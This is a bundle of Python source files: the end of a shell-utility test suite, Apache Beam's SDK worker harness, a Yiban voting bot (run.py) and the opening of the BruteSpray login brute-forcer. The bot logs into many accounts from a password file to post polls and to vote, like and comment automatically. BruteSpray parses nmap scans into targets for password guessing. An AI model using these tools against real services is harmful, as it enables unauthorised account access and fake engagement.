def __it_should_write_the_command_error_output_to_the_stderr_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
action(stderr=output_file)
output_file.seek(0)
command_error_output = ustr(output_file.read(), encoding='utf-8', errors="backslashreplace")
self.assertEqual("TEST STRING\n", command_error_output, "stderr was not redirected to the output file correctly")
def test_run_command_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_command(self.__create_tee_script(), input="TEST STRING\n", stderr=stderr))
def test_run_pipe_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], stderr=stderr))
def test_run_pipe_should_capture_the_stderr_of_all_the_commands_in_the_pipe(self):
with self.assertRaises(shellutil.CommandError) as context_manager:
shellutil.run_pipe([
["echo", "TEST STRING"],
[self.__create_tee_script()],
[self.__create_tee_script()],
[self.__create_tee_script(return_code=1)]])
self.assertEqual("TEST STRING\n" * 3, context_manager.exception.stderr, "Expected 3 copies of the test string since there are 3 commands in the pipe")
def test_run_command_should_return_a_string_by_default(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING")
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_string_by_default(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]])
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_command_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING", encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
# R0912: Too many branches (13/12) (too-many-branches) -- Disabled: Branches are sequential
def test_run_command_run_pipe_run_get_output_should_keep_track_of_the_running_commands(self): # pylint:disable=R0912
# The children processes run this script, which creates a file with the PIDs of the script and its parent and then sleeps for a long time
child_script = os.path.join(self.tmp_dir, "write_pids.py")
AgentTestCase.create_script(child_script, """
import os
import sys
import time
with open(sys.argv[1], "w") as pid_file:
pid_file.write("{0} {1}".format(os.getpid(), os.getppid()))
time.sleep(120)
""")
threads = []
try:
child_processes = []
parent_processes = []
try:
# each of these files will contain the PIDs of the command that created it and its parent
pid_files = [os.path.join(self.tmp_dir, "pids.txt.{0}".format(i)) for i in range(4)]
# we test these functions in shellutil
commands_to_execute = [
# run_get_output must be the first in this list; see the code to fetch the PIDs a few lines below
lambda: shellutil.run_get_output("{0} {1}".format(child_script, pid_files[0])),
lambda: shellutil.run_command([child_script, pid_files[1]]),
lambda: shellutil.run_pipe([[child_script, pid_files[2]], [child_script, pid_files[3]]]),
]
# start each command on a separate thread (since we need to examine the processes running the commands while they are running)
def invoke(command):
try:
command()
except shellutil.CommandError as command_error:
if command_error.returncode != -9: # test cleanup terminates the commands, so this is expected
raise
for cmd in commands_to_execute:
thread = threading.Thread(target=invoke, args=(cmd,))
thread.start()
threads.append(thread)
# now fetch the PIDs in the files created by the commands, but wait until they are created
if not wait_for(lambda: all(os.path.exists(file) and os.path.getsize(file) > 0 for file in pid_files)):
raise Exception("The child processes did not start within the allowed timeout")
for sig_file in pid_files:
with open(sig_file, "r") as read_handle:
pids = read_handle.read().split()
child_processes.append(int(pids[0]))
parent_processes.append(int(pids[1]))
# the first item to in the PIDs we fetched corresponds to run_get_output, which invokes the command using the
# shell, so in that case we need to use the parent's pid (i.e. the shell that we started)
started_commands = parent_processes[0:1] + child_processes[1:]
# wait for all the commands to start
def all_commands_running():
all_commands_running.running_commands = shellutil.get_running_commands()
return len(all_commands_running.running_commands) >= len(commands_to_execute) + 1 # +1 because run_pipe starts 2 commands
all_commands_running.running_commands = []
if not wait_for(all_commands_running):
self.fail("shellutil.get_running_commands() did not report the expected number of commands after the allowed timeout.\nExpected: {0}\nGot: {1}".format(
format_processes(started_commands), format_processes(all_commands_running.running_commands)))
started_commands.sort()
all_commands_running.running_commands.sort()
self.assertEqual(
started_commands,
all_commands_running.running_commands,
"shellutil.get_running_commands() did not return the expected commands.\nExpected: {0}\nGot: {1}".format(
format_processes(started_commands), format_processes(all_commands_running.running_commands)))
finally:
# terminate the child processes, since they are blocked
for pid in child_processes:
os.kill(pid, signal.SIGKILL)
# once the processes complete, their PIDs should go away
def no_commands_running():
no_commands_running.running_commands = shellutil.get_running_commands()
return len(no_commands_running.running_commands) == 0
no_commands_running.running_commands = []
if not wait_for(no_commands_running):
self.fail("shellutil.get_running_commands() should return empty after the commands complete. Got: {0}".format(
format_processes(no_commands_running.running_commands)))
finally:
for thread in threads:
thread.join(timeout=5)
if __name__ == '__main__':
unittest.main()
|
sdk_worker.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from builtins import range
from concurrent import futures
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
SCHEDULING_DELAY_THRESHOLD_SEC = 5*60 # 5 Minutes
def __init__(
self, control_address, worker_count, credentials=None, worker_id=None,
profiler_factory=None):
self._alive = True
self._worker_count = worker_count
self._worker_index = 0
self._worker_id = worker_id
if credentials is None:
logging.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address)
else:
logging.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
logging.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials)
self._state_handler_factory = GrpcStateHandlerFactory(credentials)
self._profiler_factory = profiler_factory
self.workers = queue.Queue()
# one thread is enough for getting the progress report.
# Assumption:
# Progress report generation should not do IO or wait on other resources.
# Without wait, having multiple threads will not improve performance and
# will only add complexity.
self._progress_thread_pool = futures.ThreadPoolExecutor(max_workers=1)
self._process_thread_pool = futures.ThreadPoolExecutor(
max_workers=self._worker_count)
self._instruction_id_vs_worker = {}
self._fns = {}
self._responses = queue.Queue()
self._process_bundle_queue = queue.Queue()
self._unscheduled_process_bundle = {}
logging.info('Initializing SDKHarness with %s workers.', self._worker_count)
def run(self):
control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(self._control_channel)
no_more_work = object()
# Create workers
bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
for _ in range(self._worker_count):
# SdkHarness manage function registration and share self._fns with all
# the workers. This is needed because function registration (register)
# and exceution(process_bundle) are send over different request and we
# do not really know which woker is going to process bundle
# for a function till we get process_bundle request. Moreover
# same function is reused by different process bundle calls and
# potentially get executed by different worker. Hence we need a
# centralized function list shared among all the workers.
self.workers.put(
SdkWorker(bundle_processor_cache,
profiler_factory=self._profiler_factory))
def get_responses():
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
monitoring_thread = threading.Thread(target=self._monitor_process_bundle)
monitoring_thread.daemon = True
monitoring_thread.start()
try:
for work_request in control_stub.Control(get_responses()):
logging.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name spacing the request method with 'request_'. The called method
# will be like self.request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
logging.info('No more requests from control plane')
logging.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._progress_thread_pool.shutdown()
self._process_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
logging.info('Done consuming work.')
def _execute(self, task, request):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
logging.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id, traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
def task():
for process_bundle_descriptor in getattr(
request, request.WhichOneof('request')).process_bundle_descriptor:
self._fns[process_bundle_descriptor.id] = process_bundle_descriptor
return beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
self._execute(task, request)
def _request_process_bundle(self, request):
def task():
# Take the free worker. Wait till a worker is free.
worker = self.workers.get()
# Get the first work item in the queue
work = self._process_bundle_queue.get()
# add the instuction_id vs worker map for progress reporting lookup
self._instruction_id_vs_worker[work.instruction_id] = worker
self._unscheduled_process_bundle.pop(work.instruction_id, None)
try:
self._execute(lambda: worker.do_instruction(work), work)
finally:
# Delete the instruction_id <-> worker mapping
self._instruction_id_vs_worker.pop(work.instruction_id, None)
# Put the worker back in the free worker pool
self.workers.put(worker)
# Create a task for each process_bundle request and schedule it
self._process_bundle_queue.put(request)
self._unscheduled_process_bundle[request.instruction_id] = time.time()
self._process_thread_pool.submit(task)
logging.debug(
"Currently using %s threads." % len(self._process_thread_pool._threads))
def _request_process_bundle_split(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
def task():
instruction_reference = getattr(
request, request.WhichOneof('request')).instruction_reference
if instruction_reference in self._instruction_id_vs_worker:
self._execute(
lambda: self._instruction_id_vs_worker[
instruction_reference
].do_instruction(request), request)
else:
self._execute(lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=(
'Process bundle request not yet scheduled for instruction {}' if
instruction_reference in self._unscheduled_process_bundle else
'Unknown process bundle instruction {}').format(
instruction_reference)), request)
self._progress_thread_pool.submit(task)
def _monitor_process_bundle(self):
"""
Monitor the unscheduled bundles and log if a bundle is not scheduled for
more than SCHEDULING_DELAY_THRESHOLD_SEC.
"""
while self._alive:
time.sleep(SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC)
# Check for bundles to be scheduled.
if self._unscheduled_process_bundle:
current_time = time.time()
for instruction_id in self._unscheduled_process_bundle:
request_time = None
try:
request_time = self._unscheduled_process_bundle[instruction_id]
except KeyError:
pass
if request_time:
scheduling_delay = current_time - request_time
if scheduling_delay > SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC:
logging.warn('Unable to schedule instruction %s for %s',
instruction_id, scheduling_delay)
class BundleProcessorCache(object):
def __init__(self, state_handler_factory, data_channel_factory, fns):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {}
self.cached_bundle_processors = collections.defaultdict(list)
def register(self, bundle_descriptor):
self.fns[bundle_descriptor.id] = bundle_descriptor
def get(self, instruction_id, bundle_descriptor_id):
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
except IndexError:
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
return processor
def lookup(self, instruction_id):
return self.active_bundle_processors.get(instruction_id, (None, None))[-1]
def discard(self, instruction_id):
del self.active_bundle_processors[instruction_id]
def release(self, instruction_id):
descriptor_id, processor = self.active_bundle_processors.pop(instruction_id)
processor.reset()
self.cached_bundle_processors[descriptor_id].append(processor)
class SdkWorker(object):
def __init__(self, bundle_processor_cache, profiler_factory=None):
self.bundle_processor_cache = bundle_processor_cache
self.profiler_factory = profiler_factory
def do_instruction(self, request):
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register))
return getattr(self, request_type)(getattr(request, request_type),
request.instruction_id)
else:
raise NotImplementedError
def register(self, request, instruction_id):
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self, request, instruction_id):
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_reference)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id):
with self.maybe_profile(instruction_id):
delayed_applications = bundle_processor.process_bundle(instruction_id)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
metrics=bundle_processor.metrics(),
monitoring_infos=bundle_processor.monitoring_infos()))
# TODO(boyuanz): Don't release here if finalize is needed.
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=processor.try_split(request))
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def process_bundle_progress(self, request, instruction_id):
# It is an error to get progress for a not-in-flight bundle.
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
metrics=processor.metrics() if processor else None,
monitoring_infos=processor.monitoring_infos() if processor else []))
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandlerFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, credentials=None):
self._state_handler_cache = {}
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
def create_state_handler(self, api_service_descriptor):
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
logging.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
logging.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
logging.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._state_handler_cache[url] = GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel))
return self._state_handler_cache[url]
def close(self):
logging.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
class ThrowingStateHandler(object):
"""A state handler that errors on any requests."""
def blocking_get(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
def blocking_append(self, state_key, data, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
def blocking_clear(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
class GrpcStateHandler(object):
_DONE = object()
def __init__(self, state_stub):
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue()
self._responses_by_id = {}
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
self._responses_by_id[response.id].set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def blocking_get(self, state_key, continuation_token=None):
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def blocking_append(self, state_key, data):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def blocking_clear(self, state_key):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
clear=beam_fn_api_pb2.StateClearRequest()))
def _blocking_request(self, request):
request.id = self._next_id()
request.instruction_reference = self._context.process_instruction_id
self._responses_by_id[request.id] = future = _Future()
self._requests.put(request)
while not future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
del self._responses_by_id[request.id]
response = future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
self._last_id += 1
return str(self._last_id)
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
|
run.py
|
import json
import queue
import threading
import time
import random
import ybapi.yblogin
from ybapi.ybvote import POETRY
from ybapi.yb import CONFIG_PATH
q = queue.Queue()
def read_passwd():
with open('passwd.txt', 'r') as f:
data = f.readlines()
for line in data:
odom = line.split('|')
if f'\n' in odom[1]:
odom[1] = odom[1].replace(f'\n', '')
account.append(odom[0])
passwd.append(odom[1])
elif f'\n' not in odom[1]:
account.append(odom[0])
passwd.append(odom[1])
''''
发布投票
'''
def add_vote_task(account, passwd):
try:
yiban_user_token = ybapi.yblogin.getUserToken(account, passwd)
token = dict(yiban_user_token=yiban_user_token)
if token != None:
add_vote_result = ybapi.ybvote.vote(token, puid, group_id).add("你觉得哪首诗句好", "你觉得哪首诗句好",
POETRY[random.randint(0, 97)],
POETRY[random.randint(0, 97)])
if '操作成功' in add_vote_result['message']:
vote_id = add_vote_result['data']['lastInsetId']
q.put(vote_id)
print('{} 发布投票成功 | 目前有{}个队列任务'.format(account, q.qsize()))
except Exception as e:
with open('error.txt', 'a') as f:
f.write("发布投票出错" + str(e) + "\r\n")
''''
主线程
'''
def run(id):
phone_it, password_it = iter(account), iter(passwd)
while True:
try:
p, p0 = next(phone_it), next(password_it)
add_vote_task(p, p0)
while not q.empty():
vote_id = q.get(block=False)
for i in range(len(account)):
try:
yiban_user_token = ybapi.yblogin.getUserToken(account[i], passwd[i])
token = dict(yiban_user_token=yiban_user_token)
if token != None:
ready_vote_result = ybapi.ybvote.go(token, puid, group_id, actor_id, vote_id, 0, 0).vote(
auto=True)
up_vote_result = ybapi.ybvote.go(token, puid, group_id, actor_id, vote_id, 0, 0).up()
reply_vote_result = ybapi.ybvote.go(token, puid, group_id, actor_id, vote_id, 0, 0).reply(
POETRY[random.randint(0, 96)])
print(
'[{}] {} 参与投票 {} 点赞投票 {} 评论投票 {} 当前任务ID {}'.format(id, account[i], ready_vote_result,
up_vote_result, reply_vote_result,
vote_id))
except Exception as e:
with open('error.txt', 'a') as f:
f.write("参与投票出错" + str(e) + "\r\n")
except StopIteration: # 当队列执行到最后一个 重新赋值
phone_it, password_it = iter(account), iter(passwd)
if __name__ == '__main__':
account = []
passwd = []
read_passwd()
ybapi.yb.Init(CONFIG_PATH, account[0], passwd[0])
with open(CONFIG_PATH) as f:
config = json.loads(f.read())
try:
group_id = config['group_id']
puid = config['puid']
channel_id = config['channel_id']
actor_id = config['actor_id']
nick = config['nick']
except Exception as e:
print(e)
exit()
t1 = threading.Thread(target=run, args=("线程1 ",))
t2 = threading.Thread(target=run, args=("线程2 ",))
t3 = threading.Thread(target=run, args=("线程3 ",))
t1.start()
time.sleep(3)
t2.start()
time.sleep(0.5)
t3.start()
|
brutespray.py
|
#! /usr/bin/python3
# -*- coding: utf-8 -*-
from argparse import RawTextHelpFormatter
import readline, glob
import sys, time, os
import subprocess
import xml.etree.ElementTree as ET
import re
import argparse
import threading
import itertools
import tempfile
import shutil
import json
from multiprocessing import Process
services = {}
loading = False
class colors:
white = "\033[1;37m"
normal = "\033[0;00m"
red = "\033[1;31m"
blue = "\033[1;34m"
green = "\033[1;32m"
lightblue = "\033[0;34m"
banner = colors.red + r"""
#@ @/
@@@ @@@
%@@@ @@@.
@@@@@ @@@@%
@@@@@ @@@@@
@@@@@@@ @ @@@@@@@
@(@@@@@@@% @@@@@@@ &@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@( @@@@@#@@@@@@@@@*@@@,@@@@@@@@@@@@@@@ @@@
@@@@@@ .@@@/@@@@@@@@@@@@@/@@@@ @@@@@@
@@@ @@@@@@@@@@@ @@@
@@@@* ,@@@@@@@@@( ,@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@.@@@@@@@@@@@@@@@ @@@
@@@@@@ @@@@@ @@@@@@
@@@@@@@@@@@@@
@@ @@@ @@
@@ @@@@@@@ @@
@@% @ @@
"""+'\n' \
+ r"""
██████╗ ██████╗ ██╗ ██╗████████╗███████╗███████╗██████╗ ██████╗ █████╗ ██╗ ██╗
██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
██████╔╝██████╔╝██║ ██║ ██║ █████╗ ███████╗██████╔╝██████╔╝███████║ ╚████╔╝
██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚════██║██╔═══╝ ██╔══██╗██╔══██║ ╚██╔╝
██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗███████║██║ ██║ ██║██║ ██║ ██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
"""+'\n' \
+ '\n brutespray.py v1.7.0' \
+ '\n Created by: Shane Young/@t1d3nio && Jacob Robles/@shellfail' \
+ '\n Inspired by: Leon Johnson/@sho-luv' \
+ '\n Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>\n' + colors.normal
#ascii art by: Cara Pearson
quiet_banner = colors.red + '~ BruteSpray ~' + colors.normal
class tabCompleter(object):
def pathCompleter(self,text,state):
line = readline.get_line_buffer().split()
return [x for x in glob.glob(text+'*')][state]
def interactive():
t = tabCompleter()
singluser = ""
if args.interactive is True:
print(colors.white + "\n\nWelcome to interactive mode!\n\n" + colors.normal)
print(colors.red + "WARNING:" + colors.white + " Leaving an option blank will leave it empty and refer to default\n\n" + colors.normal)
print("Available services to brute-force:")
for serv in services:
srv = serv
for prt in services[serv]:
iplist = services[serv][prt]
port = prt
plist = len(iplist)
print("Service: " + colors.green + str(serv) + colors.normal + " on port " + colors.red + str(port) + colors.normal + " with " + colors.red + str(plist) + colors.normal + " hosts")
args.service = input('\n' + colors.lightblue + 'Enter services you want to brute - default all (ssh,ftp,etc): ' + colors.red)
args.threads = input(colors.lightblue + 'Enter the number of parallel threads (default is 2): ' + colors.red)
args.hosts = input(colors.lightblue + 'Enter the number of parallel hosts to scan per service (default is 1): ' + colors.red)
if args.passlist is None or args.userlist is None:
customword = input(colors.lightblue + 'Would you like to specify a wordlist? (y/n): ' + colors.red)
if customword == "y":
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.pathCompleter)
if args.userlist is None and args.username is None:
args.userlist = input(colors.lightblue + 'Enter a userlist you would like to use: ' + colors.red)
if args.userlist == "":
args.userlist = None
if args.passlist is None and args.password is None:
args.passlist = input(colors.lightblue + 'Enter a passlist you would like to use: ' + colors.red)
if args.passlist == "":
args.passlist = None
if args.username is None or args.password is None:
singluser = input(colors.lightblue + 'Would to specify a single username or password (y/n): ' + colors.red)
if singluser == "y":
if args.username is None and args.userlist is None:
args.username = input(colors.lightblue + 'Enter a username: ' + colors.red)
if args.username == "":
args.username = None
if args.password is None and args.passlist is None:
args.password = input(colors.lightblue + 'Enter a password: ' + colors.red)
if args.password == "":
args.password = None
if args.username is None and args.userlist is None:
combo = input(colors.lightblue + 'Enter a combolist you would like to use: ' + colors.red)
if combo == "y":
args.combo = input(colors.lightblue + 'Enter a combolist you would like to use: ' + colors.red)
if args.combo == "":
args.combo = None
if args.service == "":
args.service = "all"
if args.threads == "":
args.threads = "2"
if args.hosts == "":
args.hosts = "1"
print(colors.normal)
NAME_MAP = {"ms-sql-s": "mssql",
"microsoft-ds": "smbnt",
"pcanywheredata": "pcanywhere",
"postgresql": "postgres",
"shell": "rsh",
"exec": "rexec",
"login": "rlogin",
"smtps": "smtp",
"submission": "smtp",
"imaps": "imap",
"pop3s": "pop3",
"iss-realsecure": "vmauthd",
"snmptrap": "snmp"}
def make_dic_gnmap():
global loading
global services
supported = ['ssh','ftp','postgres','telnet','mysql','ms-sql-s','shell',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp', 'smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
port = None
with open(args.file, 'r') as nmap_file:
for line in nmap_file:
for name in supported:
matches = re.compile(r'([0-9][0-9]*)/open/[a-z][a-z]*//' + name)
try:
port = matches.findall(line)[0]
except:
continue
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', line)
tmp_ports = matches.findall(line)
for tmp_port in tmp_ports:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += ip
else:
services[name][tmp_port] = ip
else:
services[name] = {tmp_port:ip}
loading = True
def make_dic_xml():
global loading
global services
supported = ['ssh','ftp','postgresql','telnet','mysql','ms-sql-s','rsh',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp','smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
tree = ET.parse(args.file)
root = tree.getroot()
for host in root.iter('host'):
ipaddr = host.find('address').attrib['addr']
for port in host.iter('port'):
cstate = port.find('state').attrib['state']
if cstate == "open":
try:
name = port.find('service').attrib['name']
tmp_port = port.attrib['portid']
iplist = ipaddr.split(',')
except:
continue
if name in supported:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += iplist
else:
services[name][tmp_port] = iplist
else:
services[name] = {tmp_port:iplist}
loading = True
def make_dic_json():
global loading
global services
supported = ['ssh','ftp','postgres','telnet','mysql','ms-sql-s','shell',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp', 'smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
with open(args.file, "r") as jsonlines_file:
for line in jsonlines_file:
data = json.loads(line)
try:
host, port, name = data["host"], data["port"], data["service"]
if name in supported:
name = NAME_MAP.get(name, name)
if name not in services:
services[name] = {}
if port not in services[name]:
services[name][port] = []
if host not in services[name][port]:
services[name][port].append(host)
except KeyError as e:
sys.stderr.write("\n[!] Field: " + str(e) + "is missing")
sys.stderr.write("\n[!] Please provide the json fields. ")
continue
loading = True
def brute(service,port,fname,output,auserlist,ausername,apasslist,apassword,acontinuous,ahosts,athreads,averbose,acombo,adebug):
if auserlist is None and ausername is None and acombo is None:
